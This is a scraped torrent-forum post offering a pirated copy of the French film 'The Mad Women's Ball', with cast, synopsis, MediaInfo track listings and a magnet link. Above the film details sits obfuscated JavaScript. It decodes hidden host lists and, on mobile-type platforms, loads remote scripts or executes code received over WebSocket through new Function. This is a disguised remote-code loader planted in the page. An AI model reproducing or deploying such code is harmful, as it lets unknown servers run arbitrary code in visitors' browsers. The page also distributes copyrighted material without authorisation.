疯女人的舞会[中文字幕].The.Mad.Womens.Ball.2021.1080p.AMZN.WEB-DL.DDP5.1.H.264 14.80GB

版主小s 12天前 239

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 疯女人的舞会/The Mad Women's Ball/疯美人舞会

◎片 名 Le Bal des folles

◎年 代 2021

◎产 地 法国

◎类 别 惊悚

◎语 言 法语

◎上映日期 2021-09-17(法国)

◎豆瓣评分 7.0/10 from 910 users

◎豆瓣链接 https://movie.douban.com/subject/34943349/

◎片 长 114分钟

◎导 演 梅拉尼·罗兰 Mélanie Laurent

◎编 剧 梅拉尼·罗兰 Mélanie Laurent

◎主 演 梅拉尼·罗兰 Mélanie Laurent

凯撒·东布瓦 César Domboy

璐·德·拉格 Lou de Laage

本杰明·瓦赞 Benjamin Voisin

艾玛纽尔·贝克特 Emmanuelle Bercot

塞德里克·康 Cédric Kahn

科拉莉·吕西耶 Coralie Russier

玛尔蒂娜·舍瓦利 Martine Chevallier

安德烈·马尔孔 André Marcon

瓦莱丽·斯特罗 Valérie Stroh

蕾雅·赛杜 Léa Seydoux

◎标 签 女性 | 法国 | 法国电影 | 剧情 | 2021 | 惊悚 | 梅拉尼·罗兰 | 蕾雅·赛杜

◎简 介

Eugénie是生活在19世纪一位光芒四射充满热情的姑娘。她有一种特殊的天赋:听得到看得见过世的人。当她的家人发现这个秘密以后,她就被爸爸和兄弟送到神经病诊所萨尔佩特里尔医院,这让她完全没有可能逃脱她的命运了。这个诊所是由著名的Charcot教授管理,他是著名的神经学专家和精神病专家先锋,收容被诊断为歇斯底里、疯狂和癫痫以及所有类型的躯体和精神障碍女病人。Eugénie接下来的道路将会遇到Geneviève,神经科女护士,这位护士的生活在她眼前流逝,可她去从未真正活过。她们的相遇将会改变她们的命运。她们准备着Charcot教授每年在诊所举行的著名《疯美人舞会》。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 179719918257100931340094946671747183421 (0x8734CC1670D0CF6CC58BC7F0EEC8B33D)

  4. Complete name : [email protected]QDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 14.8 GiB

  8. Duration : 2 h 1 min

  9. Overall bit rate : 17.4 Mb/s

  10. Encoded date : UTC 2021-10-09 09:07:13

  11. Writing application : mkvmerge v48.0.0 ('Fortress Around Your Heart') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.0


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 4 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 4 frames

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 2 h 1 min

  23. Bit rate : 11.6 Mb/s

  24. Width : 1 920 pixels

  25. Height : 800 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 8 bits

  32. Scan type : Progressive

  33. Bits/(Pixel*Frame) : 0.315

  34. Stream size : 9.89 GiB (67%)

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : E-AC-3

  44. Format/Info : Enhanced AC-3

  45. Commercial name : Dolby Digital Plus

  46. Codec ID : A_EAC3

  47. Duration : 2 h 1 min

  48. Bit rate mode : Constant

  49. Bit rate : 640 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : L R C LFE Ls Rs

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 31.250 FPS (1536 SPF)

  54. Compression mode : Lossy

  55. Stream size : 558 MiB (4%)

  56. Title : German

  57. Language : German

  58. Service kind : Complete Main

  59. Default : No

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : E-AC-3

  64. Format/Info : Enhanced AC-3

  65. Commercial name : Dolby Digital Plus

  66. Codec ID : A_EAC3

  67. Duration : 2 h 1 min

  68. Bit rate mode : Constant

  69. Bit rate : 640 kb/s

  70. Channel(s) : 6 channels

  71. Channel layout : L R C LFE Ls Rs

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 558 MiB (4%)

  76. Title : Castilian

  77. Language : Spanish

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Audio #3

  82. ID : 4

  83. Format : E-AC-3

  84. Format/Info : Enhanced AC-3

  85. Commercial name : Dolby Digital Plus

  86. Codec ID : A_EAC3

  87. Duration : 2 h 1 min

  88. Bit rate mode : Constant

  89. Bit rate : 640 kb/s

  90. Channel(s) : 6 channels

  91. Channel layout : L R C LFE Ls Rs

  92. Sampling rate : 48.0 kHz

  93. Frame rate : 31.250 FPS (1536 SPF)

  94. Compression mode : Lossy

  95. Stream size : 558 MiB (4%)

  96. Title : Spanish

  97. Language : Spanish

  98. Service kind : Complete Main

  99. Default : No

  100. Forced : No


  101. Audio #4

  102. ID : 5

  103. Format : E-AC-3

  104. Format/Info : Enhanced AC-3

  105. Commercial name : Dolby Digital Plus

  106. Codec ID : A_EAC3

  107. Duration : 2 h 1 min

  108. Bit rate mode : Constant

  109. Bit rate : 640 kb/s

  110. Channel(s) : 6 channels

  111. Channel layout : L R C LFE Ls Rs

  112. Sampling rate : 48.0 kHz

  113. Frame rate : 31.250 FPS (1536 SPF)

  114. Compression mode : Lossy

  115. Stream size : 558 MiB (4%)

  116. Title : French

  117. Language : French

  118. Service kind : Complete Main

  119. Default : No

  120. Forced : No


  121. Audio #5

  122. ID : 6

  123. Format : E-AC-3

  124. Format/Info : Enhanced AC-3

  125. Commercial name : Dolby Digital Plus

  126. Codec ID : A_EAC3

  127. Duration : 2 h 1 min

  128. Bit rate mode : Constant

  129. Bit rate : 640 kb/s

  130. Channel(s) : 6 channels

  131. Channel layout : L R C LFE Ls Rs

  132. Sampling rate : 48.0 kHz

  133. Frame rate : 31.250 FPS (1536 SPF)

  134. Compression mode : Lossy

  135. Stream size : 558 MiB (4%)

  136. Title : French [Audiodescription]

  137. Language : French

  138. Service kind : Complete Main

  139. Default : No

  140. Forced : No


  141. Audio #6

  142. ID : 7

  143. Format : E-AC-3

  144. Format/Info : Enhanced AC-3

  145. Commercial name : Dolby Digital Plus

  146. Codec ID : A_EAC3

  147. Duration : 2 h 1 min

  148. Bit rate mode : Constant

  149. Bit rate : 640 kb/s

  150. Channel(s) : 6 channels

  151. Channel layout : L R C LFE Ls Rs

  152. Sampling rate : 48.0 kHz

  153. Frame rate : 31.250 FPS (1536 SPF)

  154. Compression mode : Lossy

  155. Stream size : 558 MiB (4%)

  156. Title : Italian

  157. Language : Italian

  158. Service kind : Complete Main

  159. Default : No

  160. Forced : No


  161. Audio #7

  162. ID : 8

  163. Format : E-AC-3

  164. Format/Info : Enhanced AC-3

  165. Commercial name : Dolby Digital Plus

  166. Codec ID : A_EAC3

  167. Duration : 2 h 1 min

  168. Bit rate mode : Constant

  169. Bit rate : 640 kb/s

  170. Channel(s) : 6 channels

  171. Channel layout : L R C LFE Ls Rs

  172. Sampling rate : 48.0 kHz

  173. Frame rate : 31.250 FPS (1536 SPF)

  174. Compression mode : Lossy

  175. Stream size : 558 MiB (4%)

  176. Title : Polish

  177. Language : Polish

  178. Service kind : Complete Main

  179. Default : No

  180. Forced : No


  181. Audio #8

  182. ID : 9

  183. Format : E-AC-3

  184. Format/Info : Enhanced AC-3

  185. Commercial name : Dolby Digital Plus

  186. Codec ID : A_EAC3

  187. Duration : 2 h 1 min

  188. Bit rate mode : Constant

  189. Bit rate : 640 kb/s

  190. Channel(s) : 6 channels

  191. Channel layout : L R C LFE Ls Rs

  192. Sampling rate : 48.0 kHz

  193. Frame rate : 31.250 FPS (1536 SPF)

  194. Compression mode : Lossy

  195. Stream size : 558 MiB (4%)

  196. Title : Portuguese

  197. Language : Portuguese

  198. Service kind : Complete Main

  199. Default : No

  200. Forced : No


  201. Audio #9

  202. ID : 10

  203. Format : E-AC-3

  204. Format/Info : Enhanced AC-3

  205. Commercial name : Dolby Digital Plus

  206. Codec ID : A_EAC3

  207. Duration : 2 h 1 min

  208. Bit rate mode : Constant

  209. Bit rate : 640 kb/s

  210. Channel(s) : 6 channels

  211. Channel layout : L R C LFE Ls Rs

  212. Sampling rate : 48.0 kHz

  213. Frame rate : 31.250 FPS (1536 SPF)

  214. Compression mode : Lossy

  215. Stream size : 558 MiB (4%)

  216. Title : Japanese

  217. Language : Japanese

  218. Service kind : Complete Main

  219. Default : No

  220. Forced : No


  221. Text #1

  222. ID : 11

  223. Format : UTF-8

  224. Codec ID : S_TEXT/UTF8

  225. Codec ID/Info : UTF-8 Plain Text

  226. Duration : 2 h 0 min

  227. Bit rate : 32 b/s

  228. Count of elements : 1018

  229. Stream size : 28.3 KiB (0%)

  230. Title : Malay

  231. Language : Malay

  232. Default : No

  233. Forced : No


  234. Text #2

  235. ID : 12

  236. Format : UTF-8

  237. Codec ID : S_TEXT/UTF8

  238. Codec ID/Info : UTF-8 Plain Text

  239. Duration : 2 h 0 min

  240. Bit rate : 31 b/s

  241. Count of elements : 1025

  242. Stream size : 27.5 KiB (0%)

  243. Title : Danish

  244. Language : Danish

  245. Default : No

  246. Forced : No


  247. Text #3

  248. ID : 13

  249. Format : UTF-8

  250. Codec ID : S_TEXT/UTF8

  251. Codec ID/Info : UTF-8 Plain Text

  252. Duration : 2 h 0 min

  253. Bit rate : 33 b/s

  254. Count of elements : 1025

  255. Stream size : 29.8 KiB (0%)

  256. Title : German

  257. Language : German

  258. Default : No

  259. Forced : No


  260. Text #4

  261. ID : 14

  262. Format : UTF-8

  263. Codec ID : S_TEXT/UTF8

  264. Codec ID/Info : UTF-8 Plain Text

  265. Duration : 2 h 0 min

  266. Bit rate : 31 b/s

  267. Count of elements : 1138

  268. Stream size : 27.9 KiB (0%)

  269. Title : English

  270. Language : English

  271. Default : No

  272. Forced : No


  273. Text #5

  274. ID : 15

  275. Format : UTF-8

  276. Codec ID : S_TEXT/UTF8

  277. Codec ID/Info : UTF-8 Plain Text

  278. Duration : 2 h 0 min

  279. Bit rate : 32 b/s

  280. Count of elements : 1025

  281. Stream size : 28.6 KiB (0%)

  282. Title : Castilian

  283. Language : Spanish

  284. Default : No

  285. Forced : No


  286. Text #6

  287. ID : 16

  288. Format : UTF-8

  289. Codec ID : S_TEXT/UTF8

  290. Codec ID/Info : UTF-8 Plain Text

  291. Duration : 2 h 0 min

  292. Bit rate : 32 b/s

  293. Count of elements : 1025

  294. Stream size : 28.7 KiB (0%)

  295. Title : Spanish

  296. Language : Spanish

  297. Default : No

  298. Forced : No


  299. Text #7

  300. ID : 17

  301. Format : UTF-8

  302. Codec ID : S_TEXT/UTF8

  303. Codec ID/Info : UTF-8 Plain Text

  304. Duration : 2 h 0 min

  305. Bit rate : 34 b/s

  306. Count of elements : 1021

  307. Stream size : 30.2 KiB (0%)

  308. Title : Filipino

  309. Language : fil

  310. Default : No

  311. Forced : No


  312. Text #8

  313. ID : 18

  314. Format : UTF-8

  315. Codec ID : S_TEXT/UTF8

  316. Codec ID/Info : UTF-8 Plain Text

  317. Duration : 1 h 55 min

  318. Bit rate : 53 b/s

  319. Count of elements : 1493

  320. Stream size : 45.4 KiB (0%)

  321. Title : French (SDH)

  322. Language : French

  323. Default : No

  324. Forced : No


  325. Text #9

  326. ID : 19

  327. Format : UTF-8

  328. Codec ID : S_TEXT/UTF8

  329. Codec ID/Info : UTF-8 Plain Text

  330. Duration : 2 h 0 min

  331. Bit rate : 31 b/s

  332. Count of elements : 1024

  333. Stream size : 27.8 KiB (0%)

  334. Title : Indonesian

  335. Language : Indonesian

  336. Default : No

  337. Forced : No


  338. Text #10

  339. ID : 20

  340. Format : UTF-8

  341. Codec ID : S_TEXT/UTF8

  342. Codec ID/Info : UTF-8 Plain Text

  343. Duration : 2 h 0 min

  344. Bit rate : 31 b/s

  345. Count of elements : 1025

  346. Stream size : 28.1 KiB (0%)

  347. Title : Italian

  348. Language : Italian

  349. Default : No

  350. Forced : No


  351. Text #11

  352. ID : 21

  353. Format : UTF-8

  354. Codec ID : S_TEXT/UTF8

  355. Codec ID/Info : UTF-8 Plain Text

  356. Duration : 2 h 0 min

  357. Bit rate : 34 b/s

  358. Count of elements : 1025

  359. Stream size : 30.4 KiB (0%)

  360. Title : Hungarian

  361. Language : Hungarian

  362. Default : No

  363. Forced : No


  364. Text #12

  365. ID : 22

  366. Format : UTF-8

  367. Codec ID : S_TEXT/UTF8

  368. Codec ID/Info : UTF-8 Plain Text

  369. Duration : 2 h 0 min

  370. Bit rate : 30 b/s

  371. Count of elements : 1025

  372. Stream size : 27.3 KiB (0%)

  373. Title : Dutch

  374. Language : Dutch

  375. Default : No

  376. Forced : No


  377. Text #13

  378. ID : 23

  379. Format : UTF-8

  380. Codec ID : S_TEXT/UTF8

  381. Codec ID/Info : UTF-8 Plain Text

  382. Duration : 2 h 0 min

  383. Bit rate : 32 b/s

  384. Count of elements : 1025

  385. Stream size : 28.6 KiB (0%)

  386. Title : Norwegian

  387. Language : Norwegian Bokmal

  388. Default : No

  389. Forced : No


  390. Text #14

  391. ID : 24

  392. Format : UTF-8

  393. Codec ID : S_TEXT/UTF8

  394. Codec ID/Info : UTF-8 Plain Text

  395. Duration : 2 h 0 min

  396. Bit rate : 31 b/s

  397. Count of elements : 1025

  398. Stream size : 27.4 KiB (0%)

  399. Title : Polish

  400. Language : Polish

  401. Default : No

  402. Forced : No


  403. Text #15

  404. ID : 25

  405. Format : UTF-8

  406. Codec ID : S_TEXT/UTF8

  407. Codec ID/Info : UTF-8 Plain Text

  408. Duration : 2 h 0 min

  409. Bit rate : 32 b/s

  410. Count of elements : 1025

  411. Stream size : 28.9 KiB (0%)

  412. Title : Portuguese (Brasil)

  413. Language : Portuguese

  414. Default : No

  415. Forced : No


  416. Text #16

  417. ID : 26

  418. Format : UTF-8

  419. Codec ID : S_TEXT/UTF8

  420. Codec ID/Info : UTF-8 Plain Text

  421. Duration : 2 h 0 min

  422. Bit rate : 30 b/s

  423. Count of elements : 1025

  424. Stream size : 27.2 KiB (0%)

  425. Title : Portuguese (Portugal)

  426. Language : Portuguese

  427. Default : No

  428. Forced : No


  429. Text #17

  430. ID : 27

  431. Format : UTF-8

  432. Codec ID : S_TEXT/UTF8

  433. Codec ID/Info : UTF-8 Plain Text

  434. Duration : 2 h 0 min

  435. Bit rate : 31 b/s

  436. Count of elements : 1025

  437. Stream size : 28.1 KiB (0%)

  438. Title : Romanian

  439. Language : Romanian

  440. Default : No

  441. Forced : No


  442. Text #18

  443. ID : 28

  444. Format : UTF-8

  445. Codec ID : S_TEXT/UTF8

  446. Codec ID/Info : UTF-8 Plain Text

  447. Duration : 2 h 0 min

  448. Bit rate : 29 b/s

  449. Count of elements : 1025

  450. Stream size : 26.4 KiB (0%)

  451. Title : Finnish

  452. Language : Finnish

  453. Default : No

  454. Forced : No


  455. Text #19

  456. ID : 29

  457. Format : UTF-8

  458. Codec ID : S_TEXT/UTF8

  459. Codec ID/Info : UTF-8 Plain Text

  460. Duration : 2 h 0 min

  461. Bit rate : 32 b/s

  462. Count of elements : 1025

  463. Stream size : 28.9 KiB (0%)

  464. Title : Swedish

  465. Language : Swedish

  466. Default : No

  467. Forced : No


  468. Text #20

  469. ID : 30

  470. Format : UTF-8

  471. Codec ID : S_TEXT/UTF8

  472. Codec ID/Info : UTF-8 Plain Text

  473. Duration : 2 h 0 min

  474. Bit rate : 32 b/s

  475. Count of elements : 1025

  476. Stream size : 28.8 KiB (0%)

  477. Title : Turkish

  478. Language : Turkish

  479. Default : No

  480. Forced : No


  481. Text #21

  482. ID : 31

  483. Format : UTF-8

  484. Codec ID : S_TEXT/UTF8

  485. Codec ID/Info : UTF-8 Plain Text

  486. Duration : 2 h 0 min

  487. Bit rate : 33 b/s

  488. Count of elements : 1025

  489. Stream size : 29.2 KiB (0%)

  490. Title : Czech

  491. Language : Czech

  492. Default : No

  493. Forced : No


  494. Text #22

  495. ID : 32

  496. Format : UTF-8

  497. Codec ID : S_TEXT/UTF8

  498. Codec ID/Info : UTF-8 Plain Text

  499. Duration : 2 h 0 min

  500. Bit rate : 58 b/s

  501. Count of elements : 1025

  502. Stream size : 51.5 KiB (0%)

  503. Title : Greek

  504. Language : Greek

  505. Default : No

  506. Forced : No


  507. Text #23

  508. ID : 33

  509. Format : UTF-8

  510. Codec ID : S_TEXT/UTF8

  511. Codec ID/Info : UTF-8 Plain Text

  512. Duration : 2 h 0 min

  513. Bit rate : 53 b/s

  514. Count of elements : 1026

  515. Stream size : 46.9 KiB (0%)

  516. Title : Russian

  517. Language : Russian

  518. Default : No

  519. Forced : No


  520. Text #24

  521. ID : 34

  522. Format : UTF-8

  523. Codec ID : S_TEXT/UTF8

  524. Codec ID/Info : UTF-8 Plain Text

  525. Duration : 2 h 0 min

  526. Bit rate : 51 b/s

  527. Count of elements : 1026

  528. Stream size : 45.5 KiB (0%)

  529. Title : Hebrew

  530. Language : Hebrew

  531. Default : No

  532. Forced : No


  533. Text #25

  534. ID : 35

  535. Format : UTF-8

  536. Codec ID : S_TEXT/UTF8

  537. Codec ID/Info : UTF-8 Plain Text

  538. Duration : 2 h 0 min

  539. Bit rate : 53 b/s

  540. Count of elements : 1026

  541. Stream size : 47.3 KiB (0%)

  542. Title : Arabic

  543. Language : Arabic

  544. Default : No

  545. Forced : No


  546. Text #26

  547. ID : 36

  548. Format : UTF-8

  549. Codec ID : S_TEXT/UTF8

  550. Codec ID/Info : UTF-8 Plain Text

  551. Duration : 2 h 0 min

  552. Bit rate : 81 b/s

  553. Count of elements : 1026

  554. Stream size : 72.1 KiB (0%)

  555. Title : Hindi

  556. Language : Hindi

  557. Default : No

  558. Forced : No


  559. Text #27

  560. ID : 37

  561. Format : UTF-8

  562. Codec ID : S_TEXT/UTF8

  563. Codec ID/Info : UTF-8 Plain Text

  564. Duration : 2 h 0 min

  565. Bit rate : 87 b/s

  566. Count of elements : 1026

  567. Stream size : 76.7 KiB (0%)

  568. Title : Tamil

  569. Language : Tamil

  570. Default : No

  571. Forced : No


  572. Text #28

  573. ID : 38

  574. Format : UTF-8

  575. Codec ID : S_TEXT/UTF8

  576. Codec ID/Info : UTF-8 Plain Text

  577. Duration : 2 h 0 min

  578. Bit rate : 84 b/s

  579. Count of elements : 1026

  580. Stream size : 74.5 KiB (0%)

  581. Title : Telugu

  582. Language : Telugu

  583. Default : No

  584. Forced : No


  585. Text #29

  586. ID : 39

  587. Format : UTF-8

  588. Codec ID : S_TEXT/UTF8

  589. Codec ID/Info : UTF-8 Plain Text

  590. Duration : 2 h 0 min

  591. Bit rate : 86 b/s

  592. Count of elements : 1026

  593. Stream size : 76.5 KiB (0%)

  594. Title : Thai

  595. Language : Thai

  596. Default : No

  597. Forced : No


  598. Text #30

  599. ID : 40

  600. Format : UTF-8

  601. Codec ID : S_TEXT/UTF8

  602. Codec ID/Info : UTF-8 Plain Text

  603. Duration : 2 h 0 min

  604. Bit rate : 34 b/s

  605. Count of elements : 1026

  606. Stream size : 30.0 KiB (0%)

  607. Title : Chinese (Simplified)

  608. Language : Chinese

  609. Default : No

  610. Forced : No


  611. Text #31

  612. ID : 41

  613. Format : UTF-8

  614. Codec ID : S_TEXT/UTF8

  615. Codec ID/Info : UTF-8 Plain Text

  616. Duration : 2 h 0 min

  617. Bit rate : 30 b/s

  618. Count of elements : 1026

  619. Stream size : 27.1 KiB (0%)

  620. Title : Chinese (Traditional)

  621. Language : Chinese

  622. Default : No

  623. Forced : No


  624. Text #32

  625. ID : 42

  626. Format : UTF-8

  627. Codec ID : S_TEXT/UTF8

  628. Codec ID/Info : UTF-8 Plain Text

  629. Duration : 2 h 0 min

  630. Bit rate : 29 b/s

  631. Count of elements : 1079

  632. Stream size : 25.9 KiB (0%)

  633. Title : Japanese

  634. Language : Japanese

  635. Default : No

  636. Forced : No


  637. Text #33

  638. ID : 43

  639. Format : UTF-8

  640. Codec ID : S_TEXT/UTF8

  641. Codec ID/Info : UTF-8 Plain Text

  642. Duration : 2 h 0 min

  643. Bit rate : 37 b/s

  644. Count of elements : 1026

  645. Stream size : 33.2 KiB (0%)

  646. Title : Korean

  647. Language : Korean

  648. Default : No

  649. Forced : No




复制代码


TAGS 惊悚

磁力链:
  • magnet:?xt=urn:btih:D9B714094D2D11A424C7D177F055027F6FBB576E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回